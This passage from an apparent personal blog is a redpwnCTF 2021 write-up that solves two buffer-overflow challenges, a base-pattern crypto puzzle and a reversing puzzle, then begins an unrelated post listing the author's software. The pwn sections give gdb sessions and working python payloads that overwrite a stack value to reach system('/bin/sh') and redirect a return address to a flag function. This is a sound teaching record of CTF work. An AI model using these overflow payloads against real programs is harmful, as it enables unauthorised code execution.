+ <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + </code> + </div> + </pre> + <p> + Since I didn't see any reference to a flag file being read, I assumed that the + <code> + system("/bin/sh") + </code> + call is our main target, so let's see if we can find that +in our assembly code. There's a call to + <code> + <system@plt> + </code> + at + <code> + <main+189> + </code> + , and +there's other weird + <code> + cmp + </code> + , + <code> + jne + </code> + and + <code> + lea + </code> + instructions before. Let's figure +out what those do! + </p> + <p> + After some stackoverflow soul searching, I found out that the + <code> + cmp + </code> + and + <code> + jne + </code> + are assembly instructions for compare, and jump-if-not-equal. They work like +this: + </p> + <pre> + <div class="prismjs"> + <code class="language-asm6502" style="white-space:pre"> + <span class="token comment"> + ; cmp compares what's in the $rbp register to 0xffffffffffffffff + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token comment"> + ; and turns on the ZERO flag if they're equal + </span> + <span class=""> + </span> + <span class=""> + 0x004012a5 <+ + </span> + <span class="token decimalnumber string"> + 0 + </span> + <span class=""> + >: + </span> + <span class="token opcode property"> + cmp + </span> + <span class=""> + QWORD PTR [rbp-0x8],0xffffffffffffffff + </span> + <span class=""> + </span> + <span class="token comment"> + ; jne checks if the ZERO flag is on, + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token comment"> + ; and if it is it jumps (in this case) to 0x4012b8 + </span> + <span class=""> + </span> + <span class=""> + ┌--0x004012aa <+ + </span> + <span class="token decimalnumber string"> + 1 + </span> + <span class=""> + >: jne 0x4012b8 <main+ + </span> + <span class="token decimalnumber string"> + 194 + </span> + <span class=""> + > + </span> + <span class=""> + │ + </span> + <span class="token comment"> + ; we can safely ignore the `lea` instruction as it doesn't impact our pwn + </span> + <span class=""> + </span> + <span class=""> + │ 0x004012ac <+ + </span> + <span class="token decimalnumber string"> + 2 + </span> + <span class=""> + >: lea rdi,[rip+0xf35] # 0x4021e8 + </span> + │ + <span class=""> + │ + </span> + <span class="token comment"> + ; the almighty syscall + </span> + <span class=""> + </span> + <span class=""> + │ 0x004012b3 <+ + </span> + <span class="token decimalnumber string"> + 3 + </span> + <span class=""> + >: call 0x4010c0 <system@plt> + </span> + │ + <span class=""> + │ + </span> + <span class="token comment"> + ; from here on the program exits without calling /bin/sh + </span> + <span class=""> + </span> + <span class=""> + └->0x004012b8 <+ + </span> + <span class="token decimalnumber string"> + 4 + </span> + <span class=""> + >: mov eax,0x0 + </span> + <span class=""> + 0x004012bd <+ + </span> + <span class="token decimalnumber string"> + 5 + </span> + <span class=""> + >: leave + </span> + <span class=""> + 0x004012be <+ + </span> + <span class="token decimalnumber string"> + 6 + </span> + <span class=""> + >: ret + </span> + </code> + </div> + </pre> + <p> + The program checks if there's + <code> + 0xffffffffffffffff + </code> + in memory + <code> + 0x8 + </code> + bytes before +the + <code> + $rbp + </code> + register. The program allocates 32 bytes of memory for our heartfelt +message, but it continues reading even if our heartfelt message is longer than +32 bytes. Let's see if we can overwrite that register >:) + </p> + <p> + Let's set a breakpoint after the + <code> + <gets@plt> + </code> + call in gdb, and run the program +with 40 bytes of + <code> + 0x61 + </code> + ('a') + </p> + <pre> + <code> + (gdb) break *0x00000000004012a5 +Breakpoint 1 at 0x4012a5 + +(gdb) run < <(python3 -c "print('a' * 40)") + </code> + </pre> + <p> + I'm using the + <code> + run + </code> + command with + <code> + < + </code> + and + <code> + <() + </code> + to pipe the output of python +into the program's + <code> + stdin + </code> + . It's unnecessary at this stage because there's an +'a' key on my keyboard, but if we were to send raw bytes, this would make it a +lot easier. + </p> + <p> + I'm also using + <a href="https://github.com/hugsy/gef"> + gef + </a> + so I get access to a command +called + <code> + context + </code> + which prints all sorts of information about registers, the +stack and a small dissassembly window. I won't show it's output here, but it +was an indispensable tool that you should install nonetheless. + </p> + <p> + Let's print the memory at + <code> + [$rbp - 0x8] + </code> + : + </p> + <pre> + <code> + (gdb) x/8gx $rbp - 0x8 +0x7fffffffd758: 0x0000000000000000 0x0000000000000000 +0x7fffffffd768: 0x00007ffff7de4b25 0x00007fffffffd858 +0x7fffffffd778: 0x0000000100000064 0x00000000004011f6 +0x7fffffffd788: 0x0000000000001000 0x00000000004012c0 + </code> + </pre> + <p> + Hmmm, no overwriteage yet. Let's try 56 bytes instead: + </p> + <pre> + <code> + (gdb) run < <(python3 -c "print('a' * 56)") +(gdb) x/8gx $rbp - 0x8 +0x7fffffffd758: 0x6161616161616161 0x6161616161616161 +0x7fffffffd768: 0x00007ffff7de4b00 0x00007fffffffd858 +0x7fffffffd778: 0x0000000100000064 0x00000000004011f6 +0x7fffffffd788: 0x0000000000001000 0x00000000004012c0 +(gdb) x/1gx $rbp - 0x8 +0x7fffffffd758: 0x6161616161616161 + </code> + </pre> + <p> + Jackpot! We've overwritten 16 bytes of the adress that the + <code> + cmp + </code> + instruction +reads. Let's try setting it to + <code> + 0xff + </code> + instead, so we get a shell. Python 3 is +not that great for binary exploitation, so the code for this is a little bit +ugly, but if it works, it works! + </p> + <pre> + <code> + (gdb) run < <(python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)") +(gdb) x/1gx $rbp - 0x8 +0x7fffffffd758: 0xffffffffffffffff + </code> + </pre> + <p> + Now let's let execution continue as normal by using the + <code> + continue + </code> + command: + </p> + <pre> + <code> + (gdb) continue +Continuing. +[Detaching after vfork from child process 22950] +[Inferior 1 (process 22947) exited normally] + </code> + </pre> + <p> + This might seem underwhelming, but our explit works! A child process was +spawned, and as a bonus, we didn't get any segmentation faults! The reason we +don't get an interactive shell is because we used python to pipe input into the +program which makes it non-interactive. + </p> + <p> + At this point I was about 12 hours in of straight gdb hell, and I was very +happy to see this shell. After discovering this, I immediately tried it outside +the debugger and was dissapointed to see that my exploit didn't work. After a +small panick attack I found out this was because of my environment variables. +You can launch an environment-less shell by using the + <code> + env -i sh + </code> + command: + </p> + <pre> + <code> + λ generic → λ git master* → env -i sh +sh-5.1$ python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)" | ./beginner-generic-pwn-number-0 +"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨" +rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self! +can you write me a heartfelt message to cheer me up? :( +sh-5.1$ # another shell :tada: + </code> + </pre> + <p> + Now it was time to actually do the exploit on the remote server. + </p> + <p> + I whipped up the most disgusting and janky python code that I won't go into +detail about, but here's what is does (in short): + </p> + <ol> + <li> + Create a thread to capture data from the server and forward it to + <code> + stdout + </code> + </li> + <li> + Capture user commands using + <code> + input() + </code> + and decide what to do with them on the main thread + </li> + </ol> + <p> + The code for this script can be found + <a href="https://github.com/lonkaars/redpwn/blob/master/challenges/generic/pwn.py"> + here + </a> + , +though be warned, it's + <em> + very + </em> + janky and you're probably better off copying +stuff from stackoverflow. Writing your own tools is more fun though, and might +also be faster than trying to wrestle with existing tools to try to get them to +do exactly what you want them to do. In this case I could've also just used + <a href="https://reverseengineering.stackexchange.com/questions/13928/managing-inputs-for-payload-injection?noredirect=1&lq=1"> + a +siple +command + </a> + . + </p> + <p> + It did help me though and I actually had to copy it for use in the other buffer +overflow challenge that I solved, so I'll probably refactor it someday for use +in other CTFs. + </p> + <h3 id="cryptoround-the-bases"> + crypto/round-the-bases + </h3> + <p> + This crypto challenge uses a text file with some hidden information. If you +open up the file in a text editor, and adjust your window width, you'll +eventually see the repeating pattern line up. This makes it very easy to see +what part of the pattern is actually changing: + </p> + <pre> + <code> + ----------------------xxxx---- +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:K0o09mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN +[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN + </code> + </pre> + <p> + I wrote a simple python script to parse this into binary data, and it worked on +the first try: + </p> + <pre> + <div class="prismjs"> + <code class="language-py" style="white-space:pre"> + <span class="token comment"> + # read the file into a string + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token builtin"> + file + </span> + <span class=""> + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token builtin"> + open + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "./round-the-bases" + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + content + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token builtin"> + file + </span> + <span class="token punctuation"> + . + </span> + <span class=""> + read + </span> + <span class="token punctuation"> + ( + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token builtin"> + file + </span> + <span class="token punctuation"> + . + </span> + <span class=""> + close + </span> + <span class="token punctuation"> + ( + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token comment"> + # split on every 30th character into a list + </span> + <span class=""> + </span> + <span class=""> + n + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token number"> + 30 + </span> + <span class=""> + </span> + <span class=""> + arr + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token punctuation"> + [ + </span> + <span class=""> + content + </span> + <span class="token punctuation"> + [ + </span> + <span class=""> + i + </span> + <span class="token punctuation"> + : + </span> + <span class=""> + i + </span> + <span class="token operator"> + + + </span> + <span class=""> + n + </span> + <span class="token punctuation"> + ] + </span> + <span class=""> + </span> + <span class="token keyword"> + for + </span> + <span class=""> + i + </span> + <span class="token keyword"> + in + </span> + <span class=""> + </span> + <span class="token builtin"> + range + </span> + <span class="token punctuation"> + ( + </span> + <span class="token number"> + 0 + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token builtin"> + len + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + content + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + n + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class="token punctuation"> + ] + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token builtin"> + bin + </span> + <span class=""> + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token punctuation"> + [ + </span> + <span class="token punctuation"> + ] + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + for + </span> + <span class=""> + line + </span> + <span class="token keyword"> + in + </span> + <span class=""> + arr + </span> + <span class="token punctuation"> + : + </span> + <span class=""> + </span> + <span class=""> + sub + </span> + <span class="token operator"> + = + </span> + <span class=""> + line + </span> + <span class="token punctuation"> + [ + </span> + <span class="token number"> + 16 + </span> + <span class="token punctuation"> + : + </span> + <span class="token number"> + 20 + </span> + <span class="token punctuation"> + ] + </span> + <span class=""> + </span> + <span class="token comment"> + # the part that changes + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + if + </span> + <span class=""> + sub + </span> + <span class="token operator"> + == + </span> + <span class=""> + </span> + <span class="token string"> + 'IIcu' + </span> + <span class="token punctuation"> + : + </span> + <span class=""> + </span> + <span class="token comment"> + # IIcu -> 0x0 + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token builtin"> + bin + </span> + <span class="token punctuation"> + . + </span> + <span class=""> + append + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + '0' + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + else + </span> + <span class="token punctuation"> + : + </span> + <span class=""> + </span> + <span class="token comment"> + # K0o0 -> 0x1 + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token builtin"> + bin + </span> + <span class="token punctuation"> + . + </span> + <span class=""> + append + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + '1' + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token builtin"> + bin + </span> + <span class=""> + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token string"> + '' + </span> + <span class="token punctuation"> + . + </span> + <span class=""> + join + </span> + <span class="token punctuation"> + ( + </span> + <span class="token builtin"> + bin + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class="token comment"> + # join all the list indices together into a string + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token comment"> + # decode the binary string into ascii characters + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + for + </span> + <span class=""> + i + </span> + <span class="token keyword"> + in + </span> + <span class=""> + </span> + <span class="token builtin"> + range + </span> + <span class="token punctuation"> + ( + </span> + <span class="token number"> + 0 + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token builtin"> + len + </span> + <span class="token punctuation"> + ( + </span> + <span class="token builtin"> + bin + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token number"> + 8 + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + : + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + print + </span> + <span class="token punctuation"> + ( + </span> + <span class="token builtin"> + chr + </span> + <span class="token punctuation"> + ( + </span> + <span class="token builtin"> + int + </span> + <span class="token punctuation"> + ( + </span> + <span class="token builtin"> + bin + </span> + <span class="token punctuation"> + [ + </span> + <span class=""> + i + </span> + <span class="token punctuation"> + : + </span> + <span class=""> + i + </span> + <span class="token operator"> + + + </span> + <span class="token number"> + 8 + </span> + <span class="token punctuation"> + ] + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token number"> + 2 + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + end + </span> + <span class="token operator"> + = + </span> + <span class="token string"> + '' + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token comment"> + # newline for good measure + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + print + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "\n" + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + end + </span> + <span class="token operator"> + = + </span> + <span class="token string"> + '' + </span> + <span class="token punctuation"> + ) + </span> + </code> + </div> + </pre> + <h3 id="pwnret2generic-flag-reader"> + pwn/ret2generic-flag-reader + </h3> + <p> + This was the second binary exploitation challenge I tackled, and it went much +better than the first because I (sort of) knew what I was doing by now. + </p> + <p> + I figured the 'ret2' part of the title challenge was short for 'return to', and +my suspicion was confirmed after looking at the c source: + </p> + <pre> + <div class="prismjs"> + <code class="language-c" style="white-space:pre"> + <span class="token macro property directive-hash"> + # + </span> + <span class="token macro property directive keyword"> + include + </span> + <span class="token macro property"> + </span> + <span class="token macro property string"> + <stdio.h> + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token macro property directive-hash"> + # + </span> + <span class="token macro property directive keyword"> + include + </span> + <span class="token macro property"> + </span> + <span class="token macro property string"> + <string.h> + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token macro property directive-hash"> + # + </span> + <span class="token macro property directive keyword"> + include + </span> + <span class="token macro property"> + </span> + <span class="token macro property string"> + <stdlib.h> + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + void + </span> + <span class=""> + </span> + <span class="token function"> + super_generic_flag_reading_function_please_ret_to_me + </span> + <span class="token punctuation"> + ( + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + { + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + char + </span> + <span class=""> + flag + </span> + <span class="token punctuation"> + [ + </span> + <span class="token number"> + 0x100 + </span> + <span class="token punctuation"> + ] + </span> + <span class=""> + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token punctuation"> + { + </span> + <span class="token number"> + 0 + </span> + <span class="token punctuation"> + } + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + FILE + </span> + <span class="token operator"> + * + </span> + <span class=""> + fp + </span> + <span class="token operator"> + = + </span> + <span class=""> + </span> + <span class="token function"> + fopen + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "./flag.txt" + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token string"> + "r" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + if + </span> + <span class=""> + </span> + <span class="token punctuation"> + ( + </span> + <span class="token operator"> + ! + </span> + <span class=""> + fp + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + { + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "no flag!! contact a member of rob inc" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + exit + </span> + <span class="token punctuation"> + ( + </span> + <span class="token operator"> + - + </span> + <span class="token number"> + 1 + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + } + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + fgets + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + flag + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token number"> + 0xff + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + fp + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + flag + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + fclose + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + fp + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + } + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + int + </span> + <span class=""> + </span> + <span class="token function"> + main + </span> + <span class="token punctuation"> + ( + </span> + <span class="token keyword"> + void + </span> + <span class="token punctuation"> + ) + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + { + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token keyword"> + char + </span> + <span class=""> + comments_and_concerns + </span> + <span class="token punctuation"> + [ + </span> + <span class="token number"> + 32 + </span> + <span class="token punctuation"> + ] + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + setbuf + </span> + <span class="token punctuation"> + ( + </span> + <span class="token constant"> + stdout + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token constant"> + NULL + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + setbuf + </span> + <span class="token punctuation"> + ( + </span> + <span class="token constant"> + stdin + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token constant"> + NULL + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + setbuf + </span> + <span class="token punctuation"> + ( + </span> + <span class="token constant"> + stderr + </span> + <span class="token punctuation"> + , + </span> + <span class=""> + </span> + <span class="token constant"> + NULL + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable..." + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "slap on some flavortext and there's no way rob will fire me now!" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + puts + </span> + <span class="token punctuation"> + ( + </span> + <span class="token string"> + "this is genius!! what do you think?" + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token function"> + gets + </span> + <span class="token punctuation"> + ( + </span> + <span class=""> + comments_and_concerns + </span> + <span class="token punctuation"> + ) + </span> + <span class="token punctuation"> + ; + </span> + <span class=""> + </span> + <span class=""> + </span> + <span class="token punctuation"> + } + </span> + </code> + </div> + </pre> + <p> + With my newfound knowledge of binary exploitation, I figured I would have to +overwrite the return pointer on the stack somehow, so the program calls the + <code> + super_generic_flag_reading_function_please_ret_to_me + </code> + function that isn't +called at all in the original. + </p> + <p> + The only input we have control over is again a call to + <code> + gets(); + </code> + </p> + <p> + Let's look at the dissassembly in gdb: + </p> + <pre> + <code> + (gdb) disas main +Dump of assembler code for function main: + 0x00000000004013f4 <+79>: call 0x4010a0 <puts@plt> + 0x00000000004013f9 <+84>: lea rdi,[rip+0xca0] # 0x4020a0 + 0x0000000000401400 <+91>: call 0x4010a0 <puts@plt> + 0x0000000000401405 <+96>: lea rdi,[rip+0xd0c] # 0x402118 + 0x000000000040140c <+103>: call 0x4010a0 <puts@plt> + 0x0000000000401411 <+108>: lea rdi,[rip+0xd48] # 0x402160 + 0x0000000000401418 <+115>: call 0x4010a0 <puts@plt> + 0x000000000040141d <+120>: lea rax,[rbp-0x20] + 0x0000000000401421 <+124>: mov rdi,rax + 0x0000000000401424 <+127>: call 0x4010e0 <gets@plt> + 0x0000000000401429 <+132>: mov eax,0x0 + 0x000000000040142e <+137>: leave + 0x000000000040142f <+138>: ret +End of assembler dump. + </code> + </pre> + <p> + We see again multiple calls to + <code> + <puts@plt> + </code> + and right after a call to + <code> + <gets@plt> + </code> + . There is no + <code> + cmp + </code> + and + <code> + jne + </code> + to be found in this challenge though. + </p> + <p> + The goal is to overwrite the + <em> + return adress + </em> + . This is a memory adress also +stored in memory, and the program will move execution to that memory adress +once it sees a + <code> + ret + </code> + instruction. In this 'vanilla' state, the return adress +always goes to the assembly equivalent of an + <code> + exit() + </code> + function. Let's see if we +can overwrite it by giving too much input: + </p> + <pre> + <code> + (gdb) break *0x000000000040142f +Breakpoint 1 at 0x40142f +(gdb) run < <(python3 -c "print('a' * 56)") +-- Breakpoint 1 hit -- +(gdb) info registers +rax 0x0 0x0 +rbx 0x401430 0x401430 +rsi 0x7ffff7f7d883 0x7ffff7f7d883 +rdi 0x7ffff7f804e0 0x7ffff7f804e0 +rbp 0x6161616161616161 0x6161616161616161 +rsp 0x7fffffffd898 0x7fffffffd898 +rip 0x40142f 0x40142f <main+138> + </code> + </pre> + <p> + As you can see, the $rbp register is completely overwritten with + <code> + 0x61 + </code> + 's. +Let's check the $rsp register to see where the + <code> + main() + </code> + function tries to go +after + <code> + ret + </code> + : + </p> + <pre> + <code> + (gdb) run +Starting program: ret2generic-flag-reader +alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... +how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! +slap on some flavortext and there's no way rob will fire me now! +this is genius!! what do you think? +a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 +-- Breakpoint 1 hit -- +(gdb) x/1gx $rsp +0x7fffffffd898: 0x3363326331633063 + </code> + </pre> + <p> + Let's use cyberchef to see what + <code> + 0x3363326331633063 + </code> + is in ascii! + </p> + <p> + </p> + <div class="image"> + <img src="/img/redpwn2021/cyberchef1.png" alt=""> + </div> + <p> + </p> + <p> + Hmm, it's backwards. Let's reverse it! + </p> + <p> + </p> + <div class="image"> + <img src="/img/redpwn2021/cyberchef2.png" alt=""> + </div> + <p> + </p> + <p> + Let's find the adress of the super generic flag reading function with gdb. + </p> + <pre> + <code> + (gdb) print super_generic_flag_reading_function_please_ret_to_me +$2 = {<text variable, no debug info>} 0x4011f6 <super_generic_flag_reading_function_please_ret_to_me> + </code> + </pre> + <p> + Now we're ready to craft a string that exploits the program and runs the secret +function! + </p> + <pre> + <code> + a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 <- original + c0c1c2c3 <- ends up in $rsp +aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa <- padding ( 0x28 * 'a' ) + + c 0 c 1 c 2 c 3 <- ends up in $rsp + 3 c 2 c 1 c 0 c <- reverse +0x3363326331633063 <- reverse (hex) +0x00000000004011f6 <- pointer we want in $rsp + f611400000000000 <- reverse + \xf6\x11\x40\x00\x00\x00\x00\x00 <- python bytestring + +exploit string: +b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00' + </code> + </pre> + <p> + Now let's try it in an environment-less shell: + </p> + <pre> + <code> + python3 -c "import sys; sys.stdout.buffer.write(b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00')" | ./ret2generic-flag-reader +alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... +how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! +slap on some flavortext and there's no way rob will fire me now! +this is genius!! what do you think? +flag{this_is_a_dummy_flag_go_solve_it_yourself} + +Segmentation fault (core dumped) +sh-5.1$ + </code> + </pre> + <h3 id="revbread-making"> + rev/bread-making + </h3> + <p> + For this challenge, I first tried using iaito again to do some program flow +analysis. After giving up on that, I decided to instead brute-force the correct +steps by hand. This was a very long and boring process. + </p> + <p> + First I used + <code> + strings + </code> + again to extract all the dialogue and user input strings +from the binary. Then I filtered them to not include obvious dialogue, but only +the possible user input strings. And this is the correct path that gives the +flag: + </p> + <pre> + <code> + add flour +add salt +add yeast +add water +hide the bowl inside a box +wait 3 hours +work in the basement +preheat the toaster oven +set a timer on your phone +watch the bread bake +pull the tray out with a towel +open the window +unplug the oven +unplug the fire alarm +wash the sink +clean the counters +flush the bread down the toilet +get ready to sleep +close the window +replace the fire alarm +brush teeth and go to bed + </code> + </pre> + <p> + In hindsight I could've probably made a simple python script to brute force all +remaining possibilities until it got longer output from the program, but +laziness took over and I decided that spending 45 minutes doing very dull work +was more worth it instead. + </p> + <h2 id="epilogue"> + Epilogue + </h2> + <p> + Of the 47 total challenges, me and Willem only solved 15. My end goal for this +CTF wasn't winning to begin with, so the outcome didn't matter for me. After +the second day I set the goal of reaching the 3rd page of the leaderboards as +my goal, and we reached 277'th place in the end which made my mom very proud! + </p> + <p> + </p> + <div class="image"> + <img src="/img/redpwn2021/leaderboard.png" alt=""> + </div> + <p> + </p> + <p> + I enjoyed the CTF a lot! There were some very frustrating challenges, and I +still don't get how people solved web/wtjs, but that's fine. I did learn how to +use GDB and a lot of other things during the CTF which were all very rewarding. +I will definitely be participating in the 2022 redpwnCTF, and maybe even some +others if they're beginner friendly :) + </p> + <p> + During the Radboud CTF and this CTF I've accumulated a lot of ideas to maybe +host one myself, though I have no clue where to start with that. Maybe keep an +eye out for that ;) + </p> +</div> + + + Software that I use + software + /post/software + April 13 2021 + <div class="contentWrapper"> + <h2 id="pc-software"> + PC software + </h2> + <p> + All of the software on this page is cool and I think you should try it. I also +use all of this software, and will update this page when I find new, + <em> + even +cooler + </em> + software to use instead. Most if not all of my configuration files +(dotfiles) are on my + <a href="https://github.com/lonkaars/dotfiles"> + github + </a> + . You can +clone these and edit them to fit your needs, or you can use them as a reference +for when you can't figure out how to configure something. + </p> + <h3 id="regular-software"> + Regular software + </h3> + <ul> + <li> + <p> + <strong> + Email client + </strong> + : + <a href="https://neomutt.org/"> + neomutt + </a> + . It's fast and simple, +though configuring it was a pain in the ass. I'm currently using it in +combination with mbsync and imapnotify to get notifications for new emails, +and sync my mailbox for fast email viewing. + </p> + </li> + <li> + <p> + <strong> + Music player + </strong> + : + <a href="https://www.musicpd.org/"> + mpd + </a> + with + <a href="https://github.com/ncmpcpp/ncmpcpp"> + ncmpcpp + </a> + . This is the best music setup +I've ever used. I download all my music in .flac format and mpd + <em> + just works + </em> + . +Since mpd has a server-client structure, I could also use this to set up +multiple devices that can add music to a central queue at a party or +something, but I just use it to launch + <a href="https://github.com/DanielFGray/fzf-scripts/blob/master/fzmp"> + an fzf mpc +wrapper + </a> + to +quickly add music while I'm doing something else. + </p> + </li> + 